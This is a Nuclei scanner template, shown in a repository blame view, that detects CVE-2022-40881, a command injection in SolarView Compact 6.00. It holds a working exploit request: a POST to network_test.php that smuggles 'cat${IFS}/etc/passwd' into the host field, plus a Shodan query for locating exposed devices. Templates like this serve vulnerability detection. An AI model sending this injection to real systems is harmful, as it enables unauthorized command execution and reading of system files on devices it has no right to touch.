nuclei-templates/http/cves/2022/CVE-2022-40881.yaml

47 lines
1.1 KiB
YAML
Raw Normal View History

2022-11-17 14:32:59 +00:00
id: CVE-2022-40881
info:
2022-11-18 08:19:07 +00:00
name: SolarView 6.00 - Remote Command Execution
2022-11-17 14:32:59 +00:00
author: For3stCo1d
severity: critical
description: |
SolarView Compact 6.00 is vulnerable to a command injection via network_test.php.
2022-11-17 14:32:59 +00:00
reference:
- https://github.com/Timorlover/SolarView_Compact_6.0_rce_via_network_test.php
2022-11-17 16:02:12 +00:00
- https://github.com/advisories/GHSA-wx3r-88rg-whxq
2022-11-18 08:19:07 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-40881
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
2022-11-18 08:19:07 +00:00
cve-id: CVE-2022-40881
cwe-id: CWE-77
epss-score: 0.90339
2022-11-17 14:32:59 +00:00
metadata:
max-request: 1
2022-11-17 14:32:59 +00:00
shodan-query: http.favicon.hash:"-244067125"
2023-06-04 08:13:42 +00:00
verified: true
2022-11-17 16:02:12 +00:00
tags: cve,cve2022,solarview,rce,lfi
2022-11-17 14:32:59 +00:00
variables:
cmd: "cat${IFS}/etc/passwd"
http:
2022-11-17 14:32:59 +00:00
- raw:
- |
POST /network_test.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
host=%0a{{cmd}}%0a&command=ping
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200